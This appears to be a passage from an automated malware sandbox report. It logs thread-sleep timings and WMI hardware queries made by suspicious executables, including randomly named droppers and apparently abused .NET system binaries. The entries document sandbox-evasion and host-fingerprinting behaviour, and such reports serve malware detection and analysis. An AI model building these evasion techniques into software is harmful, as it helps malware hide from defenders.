Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 8180	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308	Thread sleep count: 3753 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308	Thread sleep count: 5990 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe TID: 1364	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe TID: 5312	Thread sleep time: -37000s >= -30000s
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe TID: 7292	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7296	Thread sleep count: 86 > 30
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7296	Thread sleep time: -860000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 8168	Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59146s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58866s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4584	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59674s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -119094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59435s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59319s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -599355s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59280s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59975s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -597156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59712s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59411s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -118544s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58896s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6852	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58282s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -57922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -57758s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -57617s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -57505s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -57375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -57265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59970s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59790s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59668s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59511s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59202s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -591262s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59880s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59727s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59414s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59158s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59532s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59141s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59761s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59622s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59501s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59355s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59245s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59856s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -119282s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59419s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -586094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -585974s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59814s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59326s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -119908s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59739s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59418s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -583273s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59867s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59700s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59541s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59804s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59458s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -580891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59848s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59717s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59542s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59412s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -580081s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59835s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59689s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59502s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59314s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59892s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59873s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59691s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59530s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59338s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59175s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58857s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58720s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -576985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59974s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59807s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59666s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59788s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59585s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59451s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59288s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59147s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58993s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58846s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58715s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58569s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -58328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59626s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59566s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -572129s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59834s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59698s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59574s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59450s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59324s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59188s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59811s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59684s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -570297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59579s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59454s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -569485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6756	Thread sleep time: -59586s >= -30000s
Source: C:\Users\user\Windows.exe TID: 7608	Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\Windows.exe TID: 5172	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe TID: 7444	Thread sleep time: -37000s >= -30000s
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe TID: 7988	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe TID: 2936	Thread sleep time: -37000s >= -30000s
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe TID: 7576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Windows.exe TID: 7256	Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\Windows.exe TID: 7308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe TID: 3704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7908	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4336	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7908	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6780	Thread sleep count: 9719 > 30
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6780	Thread sleep time: -97190000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6752	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
